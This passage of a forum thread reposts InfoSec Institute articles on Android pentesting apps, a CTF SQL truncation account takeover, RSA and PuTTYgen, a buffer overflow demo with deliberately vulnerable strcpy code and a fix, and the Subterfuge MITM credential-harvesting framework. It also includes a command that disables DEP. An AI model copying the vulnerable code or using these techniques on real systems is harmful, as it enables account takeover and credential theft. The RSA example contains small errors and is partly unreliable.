server with TCP or UDP packets with the intention of disrupting the service of a particular host. AnDOSid: AnDOSid allows security professionals to simulate a DOS attack. AnDOSid app launched a HTTP POST flood attack, where the number of HTTP requests becomes so huge, a victim’s server has trouble responding to them all. When the server begins to rely too heavily on its system resources, it crashes. 3. Packet sniffer Intercepter-NG: Intercepter-NG is a multifunctional network toolkit. It has functionality of several famous separate tools and moreover offers a good and unique alternative of Wireshark for Android. The main features are: network discovery with OS detection network traffic analysis password recovery file recovery Shark for Root: Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump, use WireShark or similar software, to preview dump on phone, use Shark Reader. PacketShark: This is a packet sniffer application. Features include friendly capture options interface, filter support, live capture view, and Dropbox upload of captured files. It allows viewing of the captured packets — no need to install other application as a viewer. 4. Scanners WPScan: WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. This app was developed by Alessio Dalla Piazza. Its intended use is to be for security professionals or WordPress administrators to assess the security posture of their WordPress installations. WPScan includes user enumeration and will detect timthumb file, theme and WordPress version. Nessus: Nessus is a popular penetration testing tool that is used to perform vulnerability scans with its client/server architecture. Nessus Android app can perform following tasks. Connect to a Nessus server (4.2 or greater) Launch existing scans on the server Start, stop or pause running scans Create and execute new scans and scan templates View and filter reports Network Mapper: A very fast net scanner for network admins that can scan your network in the office and export as CSV via Gmail to give you a map of what devices are on your LAN. Includes a port scanner for security audit scans and a MAC vendor database to identify NIC manufacturers. Can detect firewalled and stealthed computers, quite useful if you are looking for a Windows/firewall box that you can’t see on your network. Useful if you want to find FTP servers, SSH servers, SMB servers, etc. on your network and would help you to diagnose faults. You can save the scan results as a CSV file, which can be imported into Excel/Google Spreadsheet/LibreOffice. 5. Webattack DroidSQLi: DroidSQLi is the first automated MySQL Injection tool for Android. It allows you to test your MySQL-based web application against SQL injection attacks. DroidSQLi supports the following injection techniques: Time based injection Blind injection Error based injection Normal injection It automatically selects the best technique to use and employs some simple filter evasion methods. Sqlmapchik: sqlmapchik is a cross-platform sqlmap GUI for the popular sqlmap tool. It is primarily aimed to be used on mobile devices. The easiest way to install sqlmapchik on an Android device is to download it from Google Play. 6. Pentesting Suites dSploit: dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device. Once dSploit is started, you will be able to easily map your network, fingerprint alive host’s operating systems and running services, search for known vulnerabilities, crack logon procedures of many tcp protocols, perform man in the middle attacks such as password sniffing, real time traffic manipulation, etc. These are the available modules in the app: RouterPWN Trace Port Scanner Inspector Vulnerability Finder Login Cracker Packet Forger MITM Revenssis Penetration Suite: Revenssis Penetration Suite is a set of all the useful types of tools used in Computer and Web Application security. Web Vulnerability Scanners including: SQL injection scanner XSS scanner DDOS scanner CSRF scanner SSL misconfiguration scanner Remote and Local File Inclusion (RFI/LFI) scanners Useful utilities such as: WHOIS lookup, IP finder, Shell, SSH, Blacklist lookup tool, Ping tool Forensic tools (in implementation) such as malware analyzers, hash crackers, network sniffer, ZIP/RAR password finder, social engineering toolset, reverse engineering tool. Vulnerability research lab (sources include: Shodan vulnerability search engine, ExploitSearch, Exploit DB, OSVDB and NVD NIST) Self scan and defense tools for your Android phone against vulnerabilities Connectivity Security Tools for Bluetooth, Wifi and Internet. (NFC, Wifi Direct and USB in implementation) zANTI: zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety. zANTI offers a comprehensive range of fully customizable scans to reveal everything from authentication, backdoor and brute-force attempts to database, DNS and protocol-specific attacks – including rogue access points. 7. Anonymity Orbot: Orbot is a free proxy app that empowers other apps to use the Internet more securely. Orbot uses Tor to encrypt your Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is an open network that helps you defend against a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security known as traffic analysis. Orbot is the safest way to use the Internet on Android. Period. Orbot bounces your encrypted traffic several times through computers around the world, instead of connecting you directly like VPNs and proxies. This process takes a little longer, but the strongest privacy and identity protection available is worth the wait. Use with Orweb, the most anonymous way to access any website, even if it’s normally blocked, monitored, or on the hidden web. Use Gibberbot with Orbot to chat confidentially with anyone, anywhere for free. Any installed app can use Tor if it has a proxy feature, using the settings. You can use private web searching with DuckDuckGo. Orbot can be configured to transparently proxy all of your Internet traffic through Tor. You can also choose which specific apps you want to use through Tor. Orbot is free software. OpenVPN: OpenVPN Connect is the official full-featured Android VPN client for the OpenVPN Access Server, Private Tunnel VPN and OpenVPN Community, developed by OpenVPN Technologies, Inc. Does not require a rooted device. Easily import .ovpn profiles from SD card, OpenVPN Access Server, Private Tunnel or via a browser link. Improved power management – preferences setting allows VPN to pause in a low-power state whenever screen is blanked or network is unavailable. Android Keychain integration – OpenVPN profiles may reference a cert/key pair in the Android keychain. Supports hardware-backed keystores Support for multi-factor authentication using OpenVPN static and dynamic challenge/response protocols. Full IPv6 support (at both the tunnel and transport layer). Orweb: Orweb is the most privacy-enhancing web browser on Android for visiting any website, even if it’s normally censored, monitored, or on the hidden web. Orweb is the safest browser on Android. Orweb evades tracking and censorship by bouncing your encrypted traffic several times through computers around the world, instead of connecting you directly like VPNs and proxies. This process takes a little longer, but the strongest privacy and identity protection available is worth the wait. Orweb bypasses almost every kind of network restriction. Orweb does not store any information about the websites you visit. You can prevent sites you visit from installing any cookies (which could track your web activities), allow them selectively, or allow any site to create cookies. JavaScript, a common attack method for malicious software, is disabled by default. Orweb is opensource. Orweb attempts to prevent Flash from loading on sites you visit, blocking many common security threats. Orweb is available in: Arabic, Chinese, Dutch, English, Esperanto, Farsi, French, German, Hungarian, Italian, Norwegian, Russian, Spanish, Swedish and Tibetan. Conclusion Android Operating System has been progressing quite rapidly. An innovative and open platform, Android is most popular mobile OS. It is well positioned to address the growing needs of the mobile marketplace. Due to rapid growth of Android, developers are now focusing on developing their tools in the Android environment. The above mentioned Android applications are the proof of that. The Software Development Kit facilitated by Android helps developers to achieve the same. The above applications discussed are ways to perform penetration testing from your Android mobile. We can achieve anonymity and can perform web attacks by using an Android phone. It also provides us with penetration suites and other networking tools. References Nindroid: Pentesting Apps for your Android device - Michael Palumbo Notacon 11 (Hacking Illustrated Series InfoSec Tutorial Videos) By Mohit Rawat|May 20th, 2014 Sursa: Penetration Testing Apps for Android Devices - InfoSec Institute
  11. SQL Truncation Attack The SQL Truncation vulnerability is a very interesting flaw in the database. The successful exploitation of this issue leads to user account compromise, as it means an attacker can access any users account with his own password. Sounds interesting! First we will see why this issue occurs in the database. If the user input value is not validating for its length, then a truncation vulnerability can arise. If the MySQL is running in default mode, Administrator account as admin, the database column is limited to 20 characters. Now what’s happening in the backend database? By default, MySQL will truncate longer strings than the defined maximum column width and only emit a warning. But those warnings are usually are seen only in the backend database, not by web applications, and are therefore not handled at all. MySQL does not compare strings in binary mode. By default, more relaxed comparison rules are used. One of these relaxations is that trailing space characters are ignored during the comparison. This means the string ‘admin ‘ is still equal to the string ‘admin’ in the database. And therefore, the application will refuse to accept the new user. If the attacker provides ‘admin ninja’ and the application searches in the database for this user, and it can’t find it because the username column name is limited to 20 characters and the attacker supplied 21 characters, the application will accept the new username and insert into the database. Due to the 20 character column length, the application will truncate the username and insert it as ‘admin ‘. Now the table contains two admin users, ‘admin’ and ‘admin ‘. Now we are going to see a practical scenario of this attack. Recently a CTF challenge took place at Capture the Flag and the first issue was SQL Truncation for capturing the first flag. We opened the URL and found a login page. Our first attempt was to check for default credentials. We tried username as admin and password as admin and we successfully logged in. What the heck happened? That was our reaction, but this is an online hosted challenge, so somebody already created this admin password. But our motive is there, that to gain access to admin with our credentials, it means we first have to create a user by registering into this application. We logged out from the application and found the register link on that page. So we registered a user from this form and then logged in into the application. Now it shows a message that “You are not Admin”. We need to compromise that admin account. The first thing we know is the default admin account exists, now we check for the username character limit, if there is any limit or not. We verify that the username with 20 characters is able to register. The application is accepting up to 20 characters, and rest of the characters are not accepted. So here we can perform the truncation attack. So again we try to register a user with username ‘admin ninjasecurity’, it is 33 characters and the password is pass@123 Here the application will accept up to 20 characters, and the rest of the characters, which are ‘ninjasecurity’, will be ignored. It will be inserted in the database as ‘admin ‘. Our user is successfully registered. Now we try to login as admin with password pass@123 and Boom! We are logged in. References: NotSoSecure Labs | Feeling NotSoSecure? We are here to help! http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/ By Rohit Shaw|May 13th, 2014 Sursa: SQL Truncation Attack - InfoSec Institute
  12. Public Key Cryptography and PuTTYgen – Program for Generating Private and Public Keys In today’s electronic world where everything is done online, “trust” is hard to come by. Conversations can be snooped on, credit card numbers can be stolen, identities can be exchanged and unseen eyes are everywhere. Imagine business emails being maliciously read by competitors, company’s proposals being leaked and even crucial corporate information being tampered with… This is where cryptography plays a crucial role, and important transactions have to be encrypted with strong algorithms to prevent leakage of information. We will discuss the basics of cryptography, public key cryptography, the RSA algorithm and the ‘PuTTYgen’ program (which is used to create and public and private keys) in this paper. It is a commonly known fact that the field of cryptography involves two major models – the symmetric cipher model and the asymmetric cipher or public key cipher model. The major difference between the two models is that the symmetric cipher model uses the same key to encrypt and decrypt messages, and the asymmetric cipher model uses different keys for encryption and decryption. Some popular symmetric algorithms are DES (Data Encryption Standard), AES (Advanced Encryption Standard) and Blowfish. Similarly popular asymmetric cipher algorithms are RSA (which stands for Ron Rivest, Adi Shamir, and Leonard Adleman, who designed the algorithm), ElGamal and DSS (Digital Signal Standard). Public Key Cryptography The key concepts in public key cryptography are plain text, encryption algorithm, cipher text, decryption algorithm and the recovered text. In addition, we make use of the most important component of public key cryptography to encrypt and decrypt the text – the public and private keys. If one key is used to encrypt the text, the other key is used to decrypt the text. The public and private keys are mathematically connected. The public keys are normally managed by a trustworthy third party person. Some of the required features of public key cryptography are listed below: The private key should be infeasible to be generated through the public key. Both the private and public keys should be easy to generate. Person ‘X’ (also popularly known as ‘Bob’) should easily be able to encrypt a message and send it to person ‘Y’ (also popularly known as ‘Alice’) using person ‘Y”s public key. Similarly, person ‘Y’ should easily be able to decrypt the message using their private key. A hacker should find it impossible to recover the original text in spite of knowing the ciphertext and the public key. Public key cryptography solves two of the symmetric cipher model’s drawbacks: The key distribution problem, which in the symmetric model is to figure a way to distribute the keys when a lot of people are involved. This is solved in the asymmetric model by having “key-value” pair. The authentication problem (verifying that the message indeed came from where it should have come from), which is solved in the asymmetric key model by making use of “digital signatures”. We will next see the RSA algorithm, which uses public key cryptography and is the basis of the PuTTYgen program. RSA Algorithm As already stated, ‘RSA’- stands for Ron Rivest, Adi Shamir and Leonard Adleman, who designed the algorithm. Most cryptographic algorithms involve tremendous amount of mathematics and the RSA algorithm is no exception. The mathematics behind the RSA algorithm are explained below in a lucid and easy to understand form. The basic idea behind the RSA algorithm is that it: “is a block cipher; it uses very large prime numbers for key generation; and the generated keys are mathematically linked.” (Walsh College, 2010) There are three steps in the RSA algorithm: generating the public and private keys encrypting the message decrypting the message. We will see a brief gist of generating the public and private keys in this paper. Generating the public and private keys: For the RSA algorithm to be highly successful, two large prime numbers are chosen (‘u’ and ‘v’) The product of the two numbers is calculated: (n=u * v) Totient of the product is calculated as: ?(n)= (u-1) (v-1) where ‘?’ is the Greek symbol ‘phi’. Next, we need to find values for ‘P’ and ‘Q’ after which the two large prime numbers can be abandoned. P * Q = 1(mod ?(n)) The only condition here is that both ‘P’ and ‘Q’ must be relatively prime to ?(n). Two numbers are relatively prime, if they have no common factors apart from 1. For example, GCD (15,10) = 5 GCD (18,10) =2 GCD (21, 10) = 1 Now, 21 and 10 are relatively prime to each other or co-prime to each other. Step (d) seems to be a bit more complicated than it actually looks. This can be simplified and re-written, assuming ‘P’ to be 7: 7 * Q = K * ?(n) + 1, where ‘K’ can be any number. Now ‘P’ and ‘R’ are the public keys and ‘Q’ and ‘R’ become the private keys. (Prime Number Hide-and-Seek: How the RSA Cipher Works) Explaining the RSA algorithm with an example: We take two small prime numbers, 5 and 11, for this example. n=(5*11)=55 “?(55) = (5 – 1) * (11 – 1) = 4 * 10 = 40. Now, we need to find numbers (‘P’ and ‘Q’) to fit the equation: P * Q = 1 (mod 40). Now, ‘P’ and ‘Q’ must be relatively prime to 40. (Prime Number Hide-and-Seek: How the RSA Cipher Works) If ‘P’ is considered as 7, and the unfamiliar modular mathematics are removed and replaced with a highly understandable equation, 7 * Q = K * 40 + 1, We next consider ‘Q’ to be 23 which is the next prime number close to 40. ‘P’ and ‘Q’ should also not be congruent to mod 40. The equation now becomes, 7 * 23 = 161 And ‘K’ now becomes ’4?. So, the primary keys are 7 and 55 and private keys are 23 and 55. The RSA algorithm is tough to crack if the keys are long. RSA keys are typically between 1024 – 2048 bits long, and a key length of 1024 bits is mostly sufficient for most calculations. Attacks against RSA: There are four different types of attacks that are possible against the RSA algorithm. Brute force: This is trying different types of combinations to crack the keys. It is very difficult to crack the algorithm when the keys are large. Mathematical attacks: This is equivalent to factoring the two large primes, which again has not been successful. Timing attacks: The timing attack depends on the running time of the decryption algorithm. Chosen ciphertext attacks: This type of attack is aimed at the properties of the algorithm. (Stallings) We will next move onto PuTTygen – a program for generating public and private keys. PuTTY “PuTTY is an SSH and telnet client, developed originally by Simon Tatham for the Windows platform. PuTTY is open source software that is available with source code and is developed and supported by a group of volunteers.” (Download PuTTY) It is used to generate public and private keys. The PuTTY program can be downloaded from this link: http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html. The following screenshot shows the opening screen of the PuTTY program. Before we move onto the other aspects of ‘PuTTYgen’ program, we will briefly divert to the topic of SSH. We can see from the above screenshot, that there are SSH-1 RSA and SSH-2 RSA and SSH2-2 DSA keys to generate. We will see a brief explanation of SSH next. SSH SSH is secure shell network protocol that is basically used to connect two networked computers securely. By means of SSH, the two computers can be used to perform remote and secure command login, secure data communication and other secure network services. SSH “connects, via a secure channel over an insecure network, a server and a client running SSH server and SSH client programs, respectively.[1] The protocol specification distinguishes between two major versions that are referred to as SSH-1 and SSH-2.” (Secure Shell) Retracing back to the PuTTY gen program, we can generate public and private keys by moving the mouse cursor constantly over the blank area. The following screenshot shows the result of generating the public and private key pair: As we can see, we have generated SSH-2 RSA keys of length 1024 bits. The public and private keys can be saved as .txt files for later use. If the keys are generated using a length of 2048 bits, security will be enhanced, but at the cost of decreased performance. The ‘passphrase’ field is optional, but it is better used. It is used to encrypt the private key in case it falls into wrong hands. The use of passphrase is explained in the University of Waterloo website which states that the private key is like a debit card and the passphrase is the PIN that is used to guard it. “With SSH private keys, if somebody manages to acquire it, they will not be able to use it until they’ve figured out your passphrase. A private key without a passphrase is like a credit card, once they acquire it they can immediately use it.” (SSH Public Key authentication) Application of the keys generated: The keys that are generated can be used for SSH authentication with OpenSSH. The public key is the one that will be stored on the server. The private key will be the key that will be stored on one’s own computer. Instead of using the traditional username and password to login, the SSH client will authenticate your private key with the public key which was stored on the server. Conclusion This paper discussed the basics of cryptography and the necessities of cryptography, followed by the public key cryptography. We next moved onto the mathematics behind the RSA algorithm and concluded with the PuTTY program, which is used to generate public and private keys. Using public and private keys for authentication may be the future for online login into various websites. Bibliography Download PuTTY. (n.d.). Retrieved April 28, 2014, from putty.org: Download PuTTY - a free SSH and telnet client for Windows Prime Number Hide-and-Seek: How the RSA Cipher Works. (n.d.). Retrieved April 28, 2014, from muppetlabs.com: Prime Number Hide-and-Seek: How the RSA Cipher Works Secure Shell. (n.d.). Retrieved April 29, 2014, from en.wikipedia.org: Secure Shell - Wikipedia, the free encyclopedia SSH Public Key authentication. (n.d.). Retrieved from Waterloo Cheriton School of Computer Science: https://cs.uwaterloo.ca/cscf/howto/ssh/public_key/ Cryptography and Network Security. In W. Stallings. Walsh College. (2010). Retrieved from Walsh College. By Jayanthi|May 2nd, 2014 Sursa: Public Key Cryptography and PuTTYgen – Program for Generating Private and Public Keys - InfoSec Institute
  13. Abstract This paper attempts to explain one of the critical buffer over?ow vulnerabilities and its detection approaches that check the referenced buffers at run time, moreover suggesting other protection mechanics applied during software deployment configuration. Programs typically written in C or C++ language are inherently susceptible to buffer overflow attacks, in which methods are often passed pointers or arrays as parameters without any indication of their size, and such malpractices are exploited later. Buffer overflows remain one of the most critical threats to systems security, especially for deployed software. Successful mistreatment of a buffer overflow attack often leads to arbitrary code execution in the form of so-called shell code, and thorough control of the vulnerable application in a vicious manner. Essentials We shall showcase buffer overflow vulnerability in a Windows environment via C++ or VC++ code which is typically written via VS 2o1o or Turbo C++. Moreover, it is expected that researchers have a comprehensive understanding about C++ syntax and concepts, especially pointers and arrays by creating a Win32 console application. Turbo C++ compiler VC++.NET GCC Compiler (optional) Buffer Overflow Bug Demo An overflow typically happens when something is filled beyond its capacity. So, buffer overrun attacks obviously occur in any program execution that allows input to be written beyond the end of an assigned buffer (memory block). Thus, it leads the data to overwrite into adjacent memory locations which are already occupied to some existing code instruction. In buffer overflow attacks, the hacker encroaches the preoccupied memory segments for other operation instruction sets to inject malicious arbitrary code, and the pre-determined program behavior is changed eventually. These buffer overflows are the implication of poor programming practices by not putting any boundaries on the size of input the program can handle. C and C++ programmed code are a great source to produce buffer overflow attacks, because these languages allow direct access to application memory. Sometimes hackers find other ways to exploit the overflow besides getting their code to run. Certain overflows do not actually allow hackers to take control, but might instead allow them to manipulate extra data. Let’s examine the following bofVul.exe login console based program which accepts user name and password at the command line to validate users. If they enter the correct username and password, it allows access; otherwise, access is denied as follows: This program was running perfectly up till now, but now imagine if a person with a vicious intention enters the parameters in the following form. He is trying to overflow the buffer by entering some garbage values and finally notices that we successfully penetrate the program even without having the correct user name and password. Bingo!!!!!!!!! It is even revealing the welcome message which is flashed when the user enters the correct credentials. So, this is a bit strange, how can this be possible? We have just entered a sequence of raw data in spite of the password and successfully obtained access. Using a different password with the same user id still worked! So it is a clear case of a buffer overflow bug because the strange behavior of program allows you to log in if you specify a long password, regardless of whether the password is correct. Buffer Overrun Internal A buffer overflow is one of the costliest security vulnerabilities known to affect computer software. It is basically defined as when input is larger than the space allocated for it, but it is written there anyhow and memory is overwritten outside the allocated location. In some cases, overflows result from incorrect handling of mathematical operation or attempts to use memory after the memory has already been allocated. Although many overflows occur when the program receives more data than it expects, in fact there are many different kinds of overflows. It is important to distinguish between various classes of overflows to be able to develop good test cases to identify specific types of overflows. Integer overflow: When a specific data type of CPU register meant to hold values within a certain range is assigned a value outside that range. An integer overflow often leads to a buffer overflow in cases in which integer overflow occurs when computing the size of the memory to allocate. Stack Overflows: Such overflows occur when data is written past the end of buffers allocated on the stack. Heap Overflow: It occurs when data is written outside the space that was allocated for it on the heap. Format String Attacks: Format string attacks occur when the %n parameter of the format string is used to write data outside the target buffer. It is important to delve deep into the CPU internal infrastructure by examining various registers which play a significant role in memory allocation. EIP [Extended Instructor Pointer]: It is only administrated by the CPU and determines next-to-execute opcode in the memory. It contains the offsets of data and instructions. ESP [Extended Stack Pointer]: It points to the zenith of the stack to assist the CPU to perform a push and pop operation. EBP [Extended Base Pointer]: It is used as a reference point for indirect addressing. EAX/EBX/ECX/EDX: They are used for arithmetic and data movement. Segments[CS/DS/SS/FS/ES/GS]: They are used as a base location for program data, instruction and stack. If a method is called by assembler 'call' commands, a new stackframe is created, with boundaries defined by the EBP and ESP. First, the call command pushes the EIP into the stack to start execution. The previous ESP becomes the new EBP and then space for variables is allocated by subtracting its size from the earlier ESP. Finally, at the end of the function call, the ESP becomes the new EBP. Now, let's consider one more buffer overflow samples which are developed under VC++ Studio. Here the user name and password are supplied as a command line argument which is copied into a corresponding fixed length array of character variables by using the strcpy method. Later, the supplied credentials are validated against a predefined password via the strcmp method as follows: #define BUFF_SIZE 10 void creed(char *usr,char *password) { char uN[10]; char pass[10]; strcpy(uN, usr); strcpy(pass, password); if(strcmp(pass,"ajay")) { printf ("n Access Denied n"); } else { printf ("n Welcome:"); .. } } int main(int argc, char* argv[]) { .. creed(argv[1],argv[2]); return 0; } The moment a user enters tom as a user name and ajay as a password via the command line argument, this program successfully validates those credentials and allows access as follows: Now try to enter some bogus data as credentials. As assumed, the program won't allow us to get access as follows. At this moment, everything is running fine and under control. The character variable uN and pass can hold only up to 10 characters and if we input data beyond this fixed length, since we are not performing any bound checking, we are just directly copying the entered data into the buffer directly via the strcpy method. The program would be confused and can't handle such abundant data, which later leads to buffer overflow as follows: Since we are testing this program under the Windows environment, the OS throws the aforesaid exception, which eventually causes the application to crash, because the program accepted too much data beyond the limit of 10. In the case of compiling this program via Turbo compiler, it notifies the buffer overflow exception in a different manner as follows: When executing the aforesaid code, it first pushes the two arguments (user name and password) to creed() method backwards onto the stack. It then calls the creed() function. The instruction CALL then pushes the instruction pointer (EIP) onto the stack. The creed () function now pushes the stack frame pointer onto the stack. The current stack pointer (ESP) is then copied into the EBP, making it the new frame pointer (SFP) as follows: Now, the creed() function instruction next instruction address 0x00412206 is saved to the stack, and execution jumps to ebp in the creed() instruction code where user name and password values are copied into eax, which are pushed into stack. Finally, on behalf of both strcpy offsets, the strcmp instruction is executed. Thereafter, the ret opcode is executed, which points out the end of program instructions. If a parameter is entered in the correct form or lesser than the fixed length, the program doesn't show any abnormal behavior. But as we are passing the argument beyond the limit, here we examine the register EBP value as 79797979 which becomes the ESP now as follows: As we move ahead, the execution should jump to 00412209 instead of 0079797979. Hence, Visual Studio throws a run time exception at 79797979 offset where the program denies reading the address space at 79797979 locations. So, the program crashes because execution is halted due to access violation, and buffer overflow attacks occur as follows: Protection Mechanisms The buffer overrun attacks can be thwarted in the Windows environment by making critical configuration changes. Visual Studio C++ compiler offers several options to enable certain checks at runtime such as /GS, RTC, Runtime library check and DEP. These options can be enabled using a specific compiler flag. The /GS option shield against vulnerable parameters passes into a function in the form of a pointer, string buffer, or C++ reference. Normally, the incoming methods parameters are assigned on the stack and are susceptible to being overwritten, just like the return address. To avoid this situation, the compiler makes a replica of the vulnerable incoming parameters after storage for local buffers, where they are not in threat of being overwritten. On the other side, the RTC compiler option control run-time checks such as underflow and overflow checking, stack verification and detection of variable use without initialization. However, these run-time checks introduce a performance overhead that is not acceptable for release builds. We must to enable these compiler checks at least: Buffer Security check (/GS) Runtime Library check (Both /RTC1…) Basic Runtime checks (Enable VC++ Run time Library) DEP Visual Studio also provides a Data Execution Prevention (DEP) option during compilation in case of not disabling it at the operating system level. Data Execution Prevention (DEP) is an important feature to protect from buffer overflow attacks. This feature has been available on Windows and assumes that no code is intended to be executed that is not part of the program itself. It uses NX technology to prevent the execution of instructions stored in data segments. This feature requires administrative right to change its settings. We can alter this configuration from the command prompt as follows: For Disable Data Execution Protection Setting bcdedit.exe /set {current} nx AlwaysOff For Enabling Data Execution Protection Setting bcdedit.exe /set {current} nx AlwaysOn We can enable this setting from My Computer advanced setting under Performance options. These options are disabled by default. In order to enable them, log in via Administrative account as follows: After finishing with all the necessary configuration or BOF attack thwarting option enabling, run the program and supply some bogus argument beyond the buffer limit. The operating system will issue a run time buffer overflow exception as follows: Even though /GS aborted the program, these overruns should be fixed. Buffer overflow attacks can be avoided at the time of coding by ensuring that input data does not exceed the size of the fixed length buffer in which it is stored. Here, the fixed length buffer size is 10, so calculate the entered data length and make sure it is less than 10 as follows: #define BUFF_SIZE 10 void creed(char *usr, char *password) { .. if (strlen(password)<BUFF_SIZE) { strcpy(uN, usr); strcpy(pass, password); } else { printf ("n Program doesn't support this password n"); exit(1); } ... } int main(int argc, char* argv[]) { .. creed(argv[1],argv[2]); return 0; } Now a buffer overflow attack can be thwarted even if other protections such GS and DEP are not applied at solution configuration. Here, the program alters and exits if data is entered beyond the buffer limit as follows: As we have stated earlier, C and C++ sources are most vulnerable to buffer overrun attack. I am going to pinpoint some C library methods which make you vulnerable. Hence, it is recommended to avoid using these methods into your source code. [TABLE] [TR] [TD]Functions[/TD] [TD]Potential Problem[/TD] [/TR] [TR] [TD]Strcpy(char *str, const char * str2)[/TD] [TD]Str buffer could overflow[/TD] [/TR] [TR] [TD]Gets(char *arr)[/TD] [TD]arr buffer could overflow[/TD] [/TR] [TR] [TD]Getwd(char *arr)[/TD] [TD]arr buffer could overflow[/TD] [/TR] [TR] [TD]Scanf()[/TD] [TD]Arguments can overflow[/TD] [/TR] [TR] [TD]Fscanf()[/TD] [TD]Arguments can overflow[/TD] [/TR] [TR] [TD]Sprint(char * str,const char *str2)[/TD] [TD]Str buffer could overflow[/TD] [/TR] [TR] [TD]Strcat(char * str, const char * str2)[/TD] [TD]Str buffer could overflow[/TD] [/TR] [/TABLE] Final Note In this article, we discussed how buffer overflows are encountered, the varieties of overflows that can materialize, and ways to control the flow of execution to our arbitrary code. We have also covered various forms of prevention mechanisms that can be taken to thwart buffer overrun attacks. Memory management and CPU registers have also been covered, giving us the elementary knowledge indispensable to detect and exploit buffer overflow vulnerability. We looked into actual exploits on how they were written and where the control on the flow of execution had taken place. Understanding all these sections will aid us in the future when it comes to analyses, debugging, and exploiting the buffer overflow vulnerability. By Ajay Yadav|April 23rd, 2014 Sursa: Buffer Overflow Attack & Defense - InfoSec Institute
  14. Subterfuge: The Automated Man-in-the-Middle Attack Framework Introduction Surfing the internet through untrustworthy public networks whether wired or wireless has been known to be risky for a long time now. We all think twice before logging into our bank account or accessing any kind of sensitive information, but what about simply browsing our favourite site? A Man in the Middle Attack (MITM) is a type of attack in which an attacker assumes the role of the default gateway and captures all the traffic going to and fro. A MITM attack allows the attacker to eavesdrop on the conversation between the parties, or to actively intervene in the conversation to achieve some illegitimate end. This is a very serious attack and also very easy to perform. In the image above you will notice that the attacker inserted him/herself in-between the flow of traffic between the client and server. Now that the attacker has intruded into the communication between the two endpoints, he/she can inject false information and intercept the data transferred between them. Subterfuge Subterfuge is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol. Subterfuge provides the framework by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek “push-button” security validation tool. Subterfuge is developed with the Python programming language and uses a SQLite database. ARPSpoof from the Dsniff suite is used to poison the target network. Subterfuge also uses SSLStrip to collect user credentials that were sent over a secure socket layer (SSL) web connection. Why Subterfuge? Subterfuge has a sleek web-based interface to allow a user to deploy the software quickly and easily without editing sophisticated text-based configuration files. Subterfuge automates the configuration process, or, alternatively, streamlines it with a Graphical User Interface (GUI). It also allows the user to view a report of all the different credentials that were harvested. Subterfuge uses software like SSLStrip, evilgrade and ARPSpoof. These will be given a brief introduction below. SSLStrip is a tool written by Moxie Marlinspike. It basically reroutes encrypted HTTPS requests from network users to plaintext HTTP requests, effectively sniffing all credentials passed along the network via SSL. The way it does this is it lets users connect via HTTP, logs their information, and then redirects their connection to the originally-intended HTTPS server on the internet. Evilgrade is a modular framework that allows us to take advantage of poor update implementations by injecting fake updates. It works with modules, each module implements the structure needed to emulate a false update of a specific application. ARPSpoof is a simple tool that allows a user to masquerade as the network gateway by spamming ARP Packets. This causes their MAC Address to be associated with the IP address of the default gateway, thereby initiating a MITM connection. Subterfuge Advantages over other MITM Tools Intuitive Interface Easy to Use Silent and Stealthy Open Source Modules in Subterfuge Subterfuge contains several modules in it. These help you to customise your attack vendors. Multiple modules can be run simultaneously. Modules in Subterfuge are as follows: Network View The Network View allows you to see everything happening on the network. It allows you to quickly and easily launch advanced attack vectors. Credential Harvester The User Credential Harvester is the default module for Subterfuge. It allows the user to transparently downgrade an HTTPS session and steal user login credentials. This runs automatically when you hit “Start. Module Builder Module Builder allows you to create your own modules. You can integrate your own attack code into the framework. Tunnel Block This module will block all attempts to avoid MITM Exploitation through encrypted tunnelling protocols like VPNs, SSH, and other encrypted protocols. SSLStrip is not included in this module, because SSLStrip automatically runs with Subterfuge. Tunnel Block will prevent the following protocols: PPTP, Cisco IPSec, L2TP, OpenVPN, SSH. Denial of Service This module disconnects a client from the network. HTTP Code Injection Subterfuge’s HTTP Code Injection Module allows a user to inject custom payloads directly into a target’s browsing session. Payloads can be anything from simple Javascript/HTML injections to browser exploits. Session Hijacking The session hijacking plug-in will allow a user to masquerade as a victim within the session that was hijacked. This attack occurs by stealing the cookie used to authenticate into a web service. Evilgrade update exploitation Evilgrade is a tool that allows a user to spoof an update server on the network. When a victim starts up a program it automatically looks to see if updates exist. Evilgrade steps into this process and sends the victim a malicious payload. Settings menu Subterfuge will attempt to auto-configure for your network. If it fails to configure the network automatically, you can go to the settings menu and manually configure it. The settings menu allows you to control and fine-tune different aspects of your attack, so if you’re a new user or seasoned vet you have control over Subterfuge. Conclusion Subterfuge is an Automated Man-in-the-Middle Attack Framework. Subterfuge Framework allows a user to circumvent many security protocols and policies on a computer network with ease and with devastating results to the victims. Subterfuge largely transforms the complexity of performing the Man in the Middle Attacks with the other existing tools and makes it far easier to launch various forms of MITMs. Subterfuge collects user information and credentials on the network to which they are connected. A Subterfuge user ought to be able to steal user credentials, without the victim’s knowledge, even when using a secure protocol such as HTTPS. References subterfuge - Automated Man-in-the-Middle Attack Framework - Google Project Hosting By Mohit Rawat|April 22nd, 2014 Sursa: Subterfuge: The Automated Man-in-the-Middle Attack Framework - InfoSec Institute
